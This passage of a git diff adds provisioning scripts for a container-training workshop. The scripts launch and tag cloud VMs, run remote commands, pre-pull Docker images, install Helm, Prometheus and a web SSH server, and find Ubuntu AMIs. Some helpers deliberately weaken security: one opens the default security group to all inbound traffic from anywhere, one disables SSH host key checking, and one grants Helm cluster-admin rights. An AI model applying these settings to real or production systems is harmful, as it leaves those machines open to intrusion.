*)
|
||||
info "Listing infrastructure $infra:"
|
||||
need_infra $infra
|
||||
infra_list
|
||||
;;
|
||||
esac
|
||||
done
|
||||
}
|
||||
|
||||
_cmd ping "Ping VMs in a given tag, to check that they have network access"
|
||||
_cmd_ping() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
fping < tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
_cmd netfix "Disable GRO and run a pinger job on the VMs"
|
||||
_cmd_netfix () {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
pssh "
|
||||
sudo ethtool -K ens3 gro off
|
||||
sudo tee /root/pinger.service <<EOF
|
||||
[Unit]
|
||||
Description=pinger
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/
|
||||
ExecStart=/bin/ping -w60 1.1
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF
|
||||
sudo systemctl enable /root/pinger.service
|
||||
sudo systemctl start pinger"
|
||||
}
|
||||
|
||||
_cmd opensg "Open the default security group to ALL ingress traffic"
|
||||
_cmd_opensg() {
|
||||
need_infra $1
|
||||
infra_opensg
|
||||
}
|
||||
|
||||
_cmd disableaddrchecks "Disable source/destination IP address checks"
|
||||
_cmd_disableaddrchecks() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
|
||||
infra_disableaddrchecks
|
||||
}
|
||||
|
||||
_cmd pssh "Run an arbitrary command on all nodes"
|
||||
_cmd_pssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
shift
|
||||
|
||||
pssh "$@"
|
||||
}
|
||||
|
||||
_cmd pull_images "Pre-pull a bunch of Docker images"
|
||||
_cmd_pull_images() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pull_tag
|
||||
}
|
||||
|
||||
_cmd quotas "Check our infrastructure quotas (max instances)"
|
||||
_cmd_quotas() {
|
||||
need_infra $1
|
||||
infra_quotas
|
||||
}
|
||||
|
||||
_cmd retag "(FIXME) Apply a new tag to a group of VMs"
|
||||
_cmd_retag() {
|
||||
OLDTAG=$1
|
||||
NEWTAG=$2
|
||||
TAG=$OLDTAG
|
||||
need_tag
|
||||
if [[ -z "$NEWTAG" ]]; then
|
||||
die "You must specify a new tag to apply."
|
||||
fi
|
||||
aws_tag_instances $OLDTAG $NEWTAG
|
||||
}
|
||||
|
||||
_cmd ssh "Open an SSH session to the first node of a tag"
|
||||
_cmd_ssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
IP=$(head -1 tags/$TAG/ips.txt)
|
||||
info "Logging into $IP"
|
||||
ssh docker@$IP
|
||||
}
|
||||
|
||||
_cmd start "Start a group of VMs"
|
||||
_cmd_start() {
|
||||
while [ ! -z "$*" ]; do
|
||||
case "$1" in
|
||||
--infra) INFRA=$2; shift 2;;
|
||||
--settings) SETTINGS=$2; shift 2;;
|
||||
--count) COUNT=$2; shift 2;;
|
||||
--tag) TAG=$2; shift 2;;
|
||||
*) die "Unrecognized parameter: $1."
|
||||
esac
|
||||
done
|
||||
|
||||
if [ -z "$INFRA" ]; then
|
||||
die "Please add --infra flag to specify which infrastructure file to use."
|
||||
fi
|
||||
if [ -z "$SETTINGS" ]; then
|
||||
die "Please add --settings flag to specify which settings file to use."
|
||||
fi
|
||||
if [ -z "$COUNT" ]; then
|
||||
COUNT=$(awk '/^clustersize:/ {print $2}' $SETTINGS)
|
||||
warning "No --count option was specified. Using value from settings file ($COUNT)."
|
||||
fi
|
||||
|
||||
# Check that the specified settings and infrastructure are valid.
|
||||
need_settings $SETTINGS
|
||||
need_infra $INFRA
|
||||
|
||||
if [ -z "$TAG" ]; then
|
||||
TAG=$(make_tag)
|
||||
fi
|
||||
mkdir -p tags/$TAG
|
||||
ln -s ../../$INFRA tags/$TAG/infra.sh
|
||||
ln -s ../../$SETTINGS tags/$TAG/settings.yaml
|
||||
echo creating > tags/$TAG/status
|
||||
|
||||
infra_start $COUNT
|
||||
sep
|
||||
info "Successfully created $COUNT instances with tag $TAG"
|
||||
sep
|
||||
echo created > tags/$TAG/status
|
||||
|
||||
info "To deploy Docker on these instances, you can run:"
|
||||
info "$0 deploy $TAG"
|
||||
info "To terminate these instances, you can run:"
|
||||
info "$0 stop $TAG"
|
||||
}
|
||||
|
||||
_cmd stop "Stop (terminate, shutdown, kill, remove, destroy...) instances"
|
||||
_cmd_stop() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
infra_stop
|
||||
echo stopped > tags/$TAG/status
|
||||
}
|
||||
|
||||
_cmd tags "List groups of VMs known locally"
|
||||
_cmd_tags() {
|
||||
(
|
||||
cd tags
|
||||
echo "[#] [Status] [Tag] [Infra]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
for tag in *; do
|
||||
if [ -f $tag/ips.txt ]; then
|
||||
count="$(wc -l < $tag/ips.txt)"
|
||||
else
|
||||
count="?"
|
||||
fi
|
||||
if [ -f $tag/status ]; then
|
||||
status="$(cat $tag/status)"
|
||||
else
|
||||
status="?"
|
||||
fi
|
||||
if [ -f $tag/infra.sh ]; then
|
||||
infra="$(basename $(readlink $tag/infra.sh))"
|
||||
else
|
||||
infra="?"
|
||||
fi
|
||||
echo "$count $status $tag $infra" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
done
|
||||
)
|
||||
}
|
||||
|
||||
_cmd test "Run tests (pre-flight checks) on a group of VMs"
|
||||
_cmd_test() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
test_tag
|
||||
}
|
||||
|
||||
_cmd helmprom "Install Helm and Prometheus"
|
||||
_cmd_helmprom() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
if i_am_first_node; then
|
||||
kubectl -n kube-system get serviceaccount helm ||
|
||||
kubectl -n kube-system create serviceaccount helm
|
||||
sudo -u docker -H helm init --service-account helm
|
||||
kubectl get clusterrolebinding helm-can-do-everything ||
|
||||
kubectl create clusterrolebinding helm-can-do-everything \
|
||||
--clusterrole=cluster-admin \
|
||||
--serviceaccount=kube-system:helm
|
||||
sudo -u docker -H helm upgrade --install prometheus stable/prometheus \
|
||||
--namespace kube-system \
|
||||
--set server.service.type=NodePort \
|
||||
--set server.service.nodePort=30090 \
|
||||
--set server.persistentVolume.enabled=false \
|
||||
--set alertmanager.enabled=false
|
||||
fi"
|
||||
}
|
||||
|
||||
# Sometimes, weave fails to come up on some nodes.
|
||||
# Symptom: the pods on a node are unreachable (they don't even ping).
|
||||
# Remedy: wipe out Weave state and delete weave pod on that node.
|
||||
# Specifically, identify the weave pod that is defective, then:
|
||||
# kubectl -n kube-system exec weave-net-XXXXX -c weave rm /weavedb/weave-netdata.db
|
||||
# kubectl -n kube-system delete pod weave-net-XXXXX
|
||||
_cmd weavetest "Check that weave seems properly setup"
|
||||
_cmd_weavetest() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
kubectl -n kube-system get pods -o name | grep weave | cut -d/ -f2 |
|
||||
xargs -I POD kubectl -n kube-system exec POD -c weave -- \
|
||||
sh -c \"./weave --local status | grep Connections | grep -q ' 1 failed' || ! echo POD \""
|
||||
}
|
||||
|
||||
_cmd webssh "Install a WEB SSH server on the machines (port 1080)"
|
||||
_cmd_webssh() {
|
||||
TAG=$1
|
||||
need_tag
|
||||
pssh "
|
||||
sudo apt-get update &&
|
||||
sudo apt-get install python-tornado python-paramiko -y"
|
||||
pssh "
|
||||
[ -d webssh ] || git clone https://github.com/jpetazzo/webssh"
|
||||
pssh "
|
||||
for KEYFILE in /etc/ssh/*.pub; do
|
||||
read a b c < \$KEYFILE; echo localhost \$a \$b
|
||||
done > webssh/known_hosts"
|
||||
pssh "cat >webssh.service <<EOF
|
||||
[Unit]
|
||||
Description=webssh
|
||||
|
||||
[Install]
|
||||
WantedBy=multi-user.target
|
||||
|
||||
[Service]
|
||||
WorkingDirectory=/home/ubuntu/webssh
|
||||
ExecStart=/usr/bin/env python run.py --fbidhttp=false --port=1080 --policy=reject
|
||||
User=nobody
|
||||
Group=nogroup
|
||||
Restart=always
|
||||
EOF"
|
||||
pssh "
|
||||
sudo systemctl enable \$PWD/webssh.service &&
|
||||
sudo systemctl start webssh.service"
|
||||
}
|
||||
|
||||
greet() {
|
||||
IAMUSER=$(aws iam get-user --query 'User.UserName')
|
||||
info "Hello! You seem to be UNIX user $USER, and IAM user $IAMUSER."
|
||||
}
|
||||
|
||||
pull_tag() {
|
||||
# Pre-pull a bunch of images
|
||||
pssh --timeout 900 'for I in \
|
||||
debian:latest \
|
||||
ubuntu:latest \
|
||||
fedora:latest \
|
||||
centos:latest \
|
||||
elasticsearch:2 \
|
||||
postgres \
|
||||
redis \
|
||||
alpine \
|
||||
registry \
|
||||
nicolaka/netshoot \
|
||||
jpetazzo/trainingwheels \
|
||||
golang \
|
||||
training/namer \
|
||||
dockercoins/hasher \
|
||||
dockercoins/rng \
|
||||
dockercoins/webui \
|
||||
dockercoins/worker \
|
||||
logstash \
|
||||
prom/node-exporter \
|
||||
google/cadvisor \
|
||||
dockersamples/visualizer \
|
||||
nathanleclaire/redisonrails; do
|
||||
sudo -u docker docker pull $I
|
||||
done'
|
||||
|
||||
info "Finished pulling images for $TAG."
|
||||
}
|
||||
|
||||
tag_is_reachable() {
|
||||
pssh -t 5 true 2>&1 >/dev/null
|
||||
}
|
||||
|
||||
test_tag() {
|
||||
ips_file=tags/$TAG/ips.txt
|
||||
info "Picking a random IP address in $ips_file to run tests."
|
||||
ip=$(shuf -n1 $ips_file)
|
||||
test_vm $ip
|
||||
info "Tests complete."
|
||||
}
|
||||
|
||||
test_vm() {
|
||||
ip=$1
|
||||
info "Testing instance with IP address $ip."
|
||||
user=ubuntu
|
||||
errors=""
|
||||
|
||||
for cmd in "hostname" \
|
||||
"whoami" \
|
||||
"hostname -i" \
|
||||
"ls -l /usr/local/bin/i_am_first_node" \
|
||||
"grep . /etc/name_of_first_node /etc/ipv4_of_first_node" \
|
||||
"cat /etc/hosts" \
|
||||
"hostnamectl status" \
|
||||
"docker version | grep Version -B1" \
|
||||
"docker-compose version" \
|
||||
"docker-machine version" \
|
||||
"docker images" \
|
||||
"docker ps" \
|
||||
"curl --silent localhost:55555" \
|
||||
"sudo ls -la /mnt/ | grep docker" \
|
||||
"env" \
|
||||
"ls -la /home/docker/.ssh"; do
|
||||
sep "$cmd"
|
||||
echo "$cmd" \
|
||||
| ssh -A -q \
|
||||
-o "UserKnownHostsFile /dev/null" \
|
||||
-o "StrictHostKeyChecking=no" \
|
||||
$user@$ip sudo -u docker -i \
|
||||
|| {
|
||||
status=$?
|
||||
error "$cmd exit status: $status"
|
||||
errors="[$status] $cmd\n$errors"
|
||||
}
|
||||
done
|
||||
sep
|
||||
if [ -n "$errors" ]; then
|
||||
error "The following commands had non-zero exit codes:"
|
||||
printf "$errors"
|
||||
fi
|
||||
info "Test VM was $ip."
|
||||
}
|
||||
|
||||
make_key_name() {
|
||||
SHORT_FINGERPRINT=$(ssh-add -l | grep RSA | head -n1 | cut -d " " -f 2 | tr -d : | cut -c 1-8)
|
||||
echo "${SHORT_FINGERPRINT}-${USER}"
|
||||
}
|
||||
|
||||
sync_keys() {
|
||||
# make sure ssh-add -l contains "RSA"
|
||||
ssh-add -l | grep -q RSA \
|
||||
|| die "The output of \`ssh-add -l\` doesn't contain 'RSA'. Start the agent, add your keys?"
|
||||
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
info "Syncing keys... "
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
aws ec2 import-key-pair --key-name $AWS_KEY_NAME \
|
||||
--public-key-material "$(ssh-add -L \
|
||||
| grep -i RSA \
|
||||
| head -n1 \
|
||||
| cut -d " " -f 1-2)" &>/dev/null
|
||||
|
||||
if ! aws ec2 describe-key-pairs --key-name "$AWS_KEY_NAME" &>/dev/null; then
|
||||
die "Somehow, importing the key didn't work. Make sure that 'ssh-add -l | grep RSA | head -n1' returns an RSA key?"
|
||||
else
|
||||
info "Imported new key $AWS_KEY_NAME."
|
||||
fi
|
||||
else
|
||||
info "Using existing key $AWS_KEY_NAME."
|
||||
fi
|
||||
}
|
||||
|
||||
make_tag() {
|
||||
if [ -z $USER ]; then
|
||||
export USER=anonymous
|
||||
fi
|
||||
date +%Y-%m-%d-%H-%M-$USER
|
||||
}
|
||||
21
prepare-vms/lib/docker-prompt
Executable file
21
prepare-vms/lib/docker-prompt
Executable file
@@ -0,0 +1,21 @@
|
||||
#!/bin/sh
|
||||
case "$DOCKER_HOST" in
|
||||
*:3376)
|
||||
echo swarm
|
||||
;;
|
||||
*:2376)
|
||||
echo $DOCKER_MACHINE_NAME
|
||||
;;
|
||||
*:2375)
|
||||
echo $DOCKER_MACHINE_NAME
|
||||
;;
|
||||
*:55555)
|
||||
echo $DOCKER_MACHINE_NAME
|
||||
;;
|
||||
"")
|
||||
echo local
|
||||
;;
|
||||
*)
|
||||
echo unknown
|
||||
;;
|
||||
esac
|
||||
174
prepare-vms/lib/find-ubuntu-ami.sh
Normal file
174
prepare-vms/lib/find-ubuntu-ami.sh
Normal file
@@ -0,0 +1,174 @@
|
||||
# borrowed from https://gist.github.com/kirikaza/6627072
|
||||
# The original script has been wrapped in a function that invokes a subshell.
|
||||
# That way, it can be safely invoked as a function from other scripts.
|
||||
|
||||
find_ubuntu_ami() {
|
||||
(
|
||||
|
||||
usage() {
|
||||
cat >&2 <<__
|
||||
usage: find-ubuntu-ami.sh [ <filter>... ] [ <sorting> ] [ <options> ]
|
||||
where:
|
||||
<filter> is pair of key and substring to search
|
||||
-r <region>
|
||||
-n <name>
|
||||
-v <version>
|
||||
-a <arch>
|
||||
-t <type>
|
||||
-d <date>
|
||||
-i <image>
|
||||
-k <kernel>
|
||||
<sorting> is one of:
|
||||
-R by region
|
||||
-N by name
|
||||
-V by version
|
||||
-A by arch
|
||||
-T by type
|
||||
-D by date
|
||||
-I by image
|
||||
-K by kernel
|
||||
<options> can be:
|
||||
-q just show AMI
|
||||
|
||||
protip for Docker orchestration workshop admin:
|
||||
./find-ubuntu-ami.sh -t hvm:ebs -r \$AWS_REGION -v 15.10 -N
|
||||
__
|
||||
exit 1
|
||||
}
|
||||
|
||||
args=$(getopt hr:n:v:a:t:d:i:k:RNVATDIKq $*)
|
||||
if [ $? != 0 ]; then
|
||||
echo >&2
|
||||
usage
|
||||
fi
|
||||
|
||||
region=
|
||||
name=
|
||||
version=
|
||||
arch=
|
||||
type=
|
||||
date=
|
||||
image=
|
||||
kernel=
|
||||
|
||||
sort=date
|
||||
|
||||
quiet=
|
||||
|
||||
set -- $args
|
||||
for a; do
|
||||
case "$a" in
|
||||
-h) usage ;;
|
||||
|
||||
-r)
|
||||
region=$2
|
||||
shift
|
||||
;;
|
||||
-n)
|
||||
name=$2
|
||||
shift
|
||||
;;
|
||||
-v)
|
||||
version=$2
|
||||
shift
|
||||
;;
|
||||
-a)
|
||||
arch=$2
|
||||
shift
|
||||
;;
|
||||
-t)
|
||||
type=$2
|
||||
shift
|
||||
;;
|
||||
-d)
|
||||
date=$2
|
||||
shift
|
||||
;;
|
||||
-i)
|
||||
image=$2
|
||||
shift
|
||||
;;
|
||||
-k)
|
||||
kernel=$2
|
||||
shift
|
||||
;;
|
||||
|
||||
-R) sort=region ;;
|
||||
-N) sort=name ;;
|
||||
-V) sort=version ;;
|
||||
-A) sort=arch ;;
|
||||
-T) sort=type ;;
|
||||
-D) sort=date ;;
|
||||
-I) sort=image ;;
|
||||
-K) sort=kernel ;;
|
||||
|
||||
-q) quiet=y ;;
|
||||
|
||||
--)
|
||||
shift
|
||||
break
|
||||
;;
|
||||
*) continue ;;
|
||||
esac
|
||||
shift
|
||||
done
|
||||
|
||||
[ $# = 0 ] || usage
|
||||
|
||||
fix_json() {
|
||||
tr -d \\n | sed 's/,]}/]}/'
|
||||
}
|
||||
|
||||
jq_query() {
|
||||
cat <<__
|
||||
.aaData | map (
|
||||
{
|
||||
region: .[0],
|
||||
name: .[1],
|
||||
version: .[2],
|
||||
arch: .[3],
|
||||
type: .[4],
|
||||
date: .[5],
|
||||
image: .[6],
|
||||
kernel: .[7]
|
||||
} | select (
|
||||
(.region | contains("$region")) and
|
||||
(.name | contains("$name")) and
|
||||
(.version | contains("$version")) and
|
||||
(.arch | contains("$arch")) and
|
||||
(.type | contains("$type")) and
|
||||
(.date | contains("$date")) and
|
||||
(.image | contains("$image</a>")) and
|
||||
(.kernel | contains("$kernel"))
|
||||
)
|
||||
) | sort_by(.$sort) | .[] |
|
||||
"\(.region)|\(.name)|\(.version)|\(.arch)|\(.type)|\(.date)|\(.image)|\(.kernel)"
|
||||
__
|
||||
}
|
||||
|
||||
trim_quotes() {
|
||||
sed 's/^"//;s/"$//'
|
||||
}
|
||||
|
||||
escape_spaces() {
|
||||
sed 's/ /\\\ /g'
|
||||
}
|
||||
|
||||
url=http://cloud-images.ubuntu.com/locator/ec2/releasesTable
|
||||
|
||||
{
|
||||
[ "$quiet" ] || echo REGION NAME VERSION ARCH TYPE DATE IMAGE KERNEL
|
||||
curl -s $url | fix_json | jq "$(jq_query)" | trim_quotes | escape_spaces | tr \| ' '
|
||||
} \
|
||||
| while read region name version arch type date image kernel; do
|
||||
image=${image%<*}
|
||||
image=${image#*>}
|
||||
if [ "$quiet" ]; then
|
||||
echo $image
|
||||
else
|
||||
echo "$region|$name|$version|$arch|$type|$date|$image|$kernel"
|
||||
fi
|
||||
done | column -t -s \|
|
||||
|
||||
)
|
||||
}
|
||||
30
prepare-vms/lib/infra.sh
Normal file
30
prepare-vms/lib/infra.sh
Normal file
@@ -0,0 +1,30 @@
|
||||
# Default stub functions for infrastructure libraries.
|
||||
# When loading an infrastructure library, these functions will be overridden.
|
||||
|
||||
infra_list() {
|
||||
warning "infra_list is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
warning "infra_quotas is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
warning "infra_start is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
warning "infra_stop is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
warning "infra_quotas is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_opensg() {
|
||||
warning "infra_opensg is unsupported on $INFRACLASS."
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
warning "infra_disableaddrchecks is unsupported on $INFRACLASS."
|
||||
}
|
||||
216
prepare-vms/lib/infra/aws.sh
Normal file
216
prepare-vms/lib/infra/aws.sh
Normal file
@@ -0,0 +1,216 @@
|
||||
infra_list() {
|
||||
aws_display_tags
|
||||
}
|
||||
|
||||
infra_quotas() {
|
||||
greet
|
||||
|
||||
max_instances=$(aws ec2 describe-account-attributes \
|
||||
--attribute-names max-instances \
|
||||
--query 'AccountAttributes[*][AttributeValues]')
|
||||
info "In the current region ($AWS_DEFAULT_REGION) you can deploy up to $max_instances instances."
|
||||
|
||||
# Print list of AWS EC2 regions, highlighting ours ($AWS_DEFAULT_REGION) in the list
|
||||
# If our $AWS_DEFAULT_REGION is not valid, the error message will be pretty descriptive:
|
||||
# Could not connect to the endpoint URL: "https://ec2.foo.amazonaws.com/"
|
||||
info "Available regions:"
|
||||
aws ec2 describe-regions | awk '{print $3}' | grep --color=auto $AWS_DEFAULT_REGION -C50
|
||||
}
|
||||
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
# Print our AWS username, to ease the pain of credential-juggling
|
||||
greet
|
||||
|
||||
# Upload our SSH keys to AWS if needed, to be added to each VM's authorized_keys
|
||||
key_name=$(sync_keys)
|
||||
|
||||
AMI=$(aws_get_ami) # Retrieve the AWS image ID
|
||||
if [ -z "$AMI" ]; then
|
||||
die "I could not find which AMI to use in this region. Try another region?"
|
||||
fi
|
||||
AWS_KEY_NAME=$(make_key_name)
|
||||
AWS_INSTANCE_TYPE=${AWS_INSTANCE_TYPE-t3a.medium}
|
||||
|
||||
sep "Starting instances"
|
||||
info " Count: $COUNT"
|
||||
info " Region: $AWS_DEFAULT_REGION"
|
||||
info " Token/tag: $TAG"
|
||||
info " AMI: $AMI"
|
||||
info " Key name: $AWS_KEY_NAME"
|
||||
info " Instance type: $AWS_INSTANCE_TYPE"
|
||||
result=$(aws ec2 run-instances \
|
||||
--key-name $AWS_KEY_NAME \
|
||||
--count $COUNT \
|
||||
--instance-type $AWS_INSTANCE_TYPE \
|
||||
--client-token $TAG \
|
||||
--block-device-mapping 'DeviceName=/dev/sda1,Ebs={VolumeSize=20}' \
|
||||
--image-id $AMI)
|
||||
reservation_id=$(echo "$result" | head -1 | awk '{print $2}')
|
||||
info "Reservation ID: $reservation_id"
|
||||
sep
|
||||
|
||||
# if instance creation succeeded, we should have some IDs
|
||||
IDS=$(aws_get_instance_ids_by_client_token $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Instance creation failed."
|
||||
fi
|
||||
|
||||
# Tag these new instances with a tag that is the same as the token
|
||||
aws_tag_instances $TAG $TAG
|
||||
|
||||
# Wait until EC2 API tells us that the instances are running
|
||||
wait_until_tag_is_running $TAG $COUNT
|
||||
|
||||
aws_get_instance_ips_by_tag $TAG > tags/$TAG/ips.txt
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
aws_kill_instances_by_tag
|
||||
}
|
||||
|
||||
infra_opensg() {
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol icmp \
|
||||
--port -1 \
|
||||
--cidr 0.0.0.0/0
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol udp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
|
||||
aws ec2 authorize-security-group-ingress \
|
||||
--group-name default \
|
||||
--protocol tcp \
|
||||
--port 0-65535 \
|
||||
--cidr 0.0.0.0/0
|
||||
}
|
||||
|
||||
infra_disableaddrchecks() {
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
for ID in $IDS; do
|
||||
info "Disabling source/destination IP checks on: $ID"
|
||||
aws ec2 modify-instance-attribute --source-dest-check "{\"Value\": false}" --instance-id $ID
|
||||
done
|
||||
}
|
||||
|
||||
wait_until_tag_is_running() {
|
||||
max_retry=100
|
||||
i=0
|
||||
done_count=0
|
||||
while [[ $done_count -lt $COUNT ]]; do
|
||||
let "i += 1"
|
||||
info "$(printf "%d/%d instances online" $done_count $COUNT)"
|
||||
done_count=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
"Name=instance-state-name,Values=running" \
|
||||
--query "length(Reservations[].Instances[])")
|
||||
if [[ $i -gt $max_retry ]]; then
|
||||
die "Timed out while waiting for instance creation (after $max_retry retries)"
|
||||
fi
|
||||
sleep 1
|
||||
done
|
||||
}
|
||||
|
||||
aws_display_tags() {
|
||||
# Print all "Name" tags in our region with their instance count
|
||||
echo "[#] [Status] [Token] [Tag]" \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
aws ec2 describe-instances \
|
||||
--query "Reservations[*].Instances[*].[State.Name,ClientToken,Tags[0].Value]" \
|
||||
| tr -d "\r" \
|
||||
| uniq -c \
|
||||
| sort -k 3 \
|
||||
| awk '{ printf "%-7s %-12s %-25s %-25s\n", $1, $2, $3, $4}'
|
||||
}
|
||||
|
||||
aws_get_tokens() {
|
||||
aws ec2 describe-instances --output text \
|
||||
--query 'Reservations[*].Instances[*].[ClientToken]' \
|
||||
| sort -u
|
||||
}
|
||||
|
||||
aws_display_instance_statuses_by_tag() {
|
||||
IDS=$(aws ec2 describe-instances \
|
||||
--filters "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].InstanceId" | tr '\t' ' ')
|
||||
|
||||
aws ec2 describe-instance-status \
|
||||
--instance-ids $IDS \
|
||||
--query "InstanceStatuses[*].{ID:InstanceId,InstanceState:InstanceState.Name,InstanceStatus:InstanceStatus.Status,SystemStatus:SystemStatus.Status,Reachability:InstanceStatus.Status}" \
|
||||
--output table
|
||||
}
|
||||
|
||||
aws_display_instances_by_tag() {
|
||||
result=$(aws ec2 describe-instances --output table \
|
||||
--filter "Name=tag:Name,Values=$TAG" \
|
||||
--query "Reservations[*].Instances[*].[ \
|
||||
InstanceId, \
|
||||
State.Name, \
|
||||
Tags[0].Value, \
|
||||
PublicIpAddress, \
|
||||
InstanceType \
|
||||
]"
|
||||
)
|
||||
if [[ -z $result ]]; then
|
||||
die "No instances found with tag $TAG in region $AWS_DEFAULT_REGION."
|
||||
else
|
||||
echo "$result"
|
||||
fi
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_filter() {
|
||||
FILTER=$1
|
||||
aws ec2 describe-instances --filters $FILTER \
|
||||
--query Reservations[*].Instances[*].InstanceId \
|
||||
--output text | tr "\t" "\n" | tr -d "\r"
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_client_token() {
|
||||
TOKEN=$1
|
||||
aws_get_instance_ids_by_filter Name=client-token,Values=$TOKEN
|
||||
}
|
||||
|
||||
aws_get_instance_ids_by_tag() {
|
||||
aws_get_instance_ids_by_filter Name=tag:Name,Values=$TAG
|
||||
}
|
||||
|
||||
aws_get_instance_ips_by_tag() {
|
||||
aws ec2 describe-instances --filter "Name=tag:Name,Values=$TAG" \
|
||||
--output text \
|
||||
--query "Reservations[*].Instances[*].PublicIpAddress" \
|
||||
| tr "\t" "\n" \
|
||||
| sort -n -t . -k 1,1 -k 2,2 -k 3,3 -k 4,4 # sort IPs
|
||||
}
|
||||
|
||||
aws_kill_instances_by_tag() {
|
||||
IDS=$(aws_get_instance_ids_by_tag $TAG)
|
||||
if [ -z "$IDS" ]; then
|
||||
die "Invalid tag."
|
||||
fi
|
||||
|
||||
info "Deleting instances with tag $TAG."
|
||||
|
||||
aws ec2 terminate-instances --instance-ids $IDS \
|
||||
| grep ^TERMINATINGINSTANCES
|
||||
|
||||
info "Deleted instances with tag $TAG."
|
||||
}
|
||||
|
||||
aws_tag_instances() {
|
||||
OLD_TAG_OR_TOKEN=$1
|
||||
NEW_TAG=$2
|
||||
IDS=$(aws_get_instance_ids_by_client_token $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
IDS=$(aws_get_instance_ids_by_tag $OLD_TAG_OR_TOKEN)
|
||||
[[ -n "$IDS" ]] && aws ec2 create-tags --tag Key=Name,Value=$NEW_TAG --resources $IDS >/dev/null
|
||||
}
|
||||
|
||||
aws_get_ami() {
|
||||
##VERSION##
|
||||
find_ubuntu_ami -r $AWS_DEFAULT_REGION -a amd64 -v 18.04 -t hvm:ebs -N -q
|
||||
}
|
||||
8
prepare-vms/lib/infra/generic.sh
Normal file
8
prepare-vms/lib/infra/generic.sh
Normal file
@@ -0,0 +1,8 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
info "You should now run your provisioning commands for $COUNT machines."
|
||||
info "Note: no machines have been automatically created!"
|
||||
info "Once done, put the list of IP addresses in tags/$TAG/ips.txt"
|
||||
info "(one IP address per line, without any comments or extra lines)."
|
||||
touch tags/$TAG/ips.txt
|
||||
}
|
||||
20
prepare-vms/lib/infra/openstack.sh
Normal file
20
prepare-vms/lib/infra/openstack.sh
Normal file
@@ -0,0 +1,20 @@
|
||||
infra_start() {
|
||||
COUNT=$1
|
||||
|
||||
cp terraform/*.tf tags/$TAG
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform init
|
||||
echo prefix = \"$TAG\" >> terraform.tfvars
|
||||
echo count = \"$COUNT\" >> terraform.tfvars
|
||||
terraform apply -auto-approve
|
||||
terraform output ip_addresses > ips.txt
|
||||
)
|
||||
}
|
||||
|
||||
infra_stop() {
|
||||
(
|
||||
cd tags/$TAG
|
||||
terraform destroy -auto-approve
|
||||
)
|
||||
}
|
||||
57
prepare-vms/lib/ips-txt-to-html.py
Executable file
57
prepare-vms/lib/ips-txt-to-html.py
Executable file
@@ -0,0 +1,57 @@
|
||||
#!/usr/bin/env python3
|
||||
import os
|
||||
import sys
|
||||
import yaml
|
||||
import jinja2
|
||||
|
||||
def prettify(l):
|
||||
l = [ip.strip() for ip in l]
|
||||
ret = [ "node{}: <code>{}</code>".format(i+1, s) for (i, s) in zip(range(len(l)), l) ]
|
||||
return ret
|
||||
|
||||
# Read settings from user-provided settings file
|
||||
SETTINGS = yaml.load(open(sys.argv[1]))
|
||||
|
||||
clustersize = SETTINGS["clustersize"]
|
||||
|
||||
ips = list(open("ips.txt"))
|
||||
|
||||
print("---------------------------------------------")
|
||||
print(" Number of IPs: {}".format(len(ips)))
|
||||
print(" VMs per cluster: {}".format(clustersize))
|
||||
print("---------------------------------------------")
|
||||
|
||||
assert len(ips)%clustersize == 0
|
||||
|
||||
clusters = []
|
||||
|
||||
while ips:
|
||||
cluster = ips[:clustersize]
|
||||
ips = ips[clustersize:]
|
||||
clusters.append(cluster)
|
||||
|
||||
template_file_name = SETTINGS["cards_template"]
|
||||
template_file_path = os.path.join(
|
||||
os.path.dirname(__file__),
|
||||
"..",
|
||||
"templates",
|
||||
template_file_name
|
||||
)
|
||||
template = jinja2.Template(open(template_file_path).read())
|
||||
with open("ips.html", "w") as f:
|
||||
f.write(template.render(clusters=clusters, **SETTINGS))
|
||||
print("Generated ips.html")
|
||||
|
||||
try:
|
||||
import pdfkit
|
||||
with open("ips.html") as f:
|
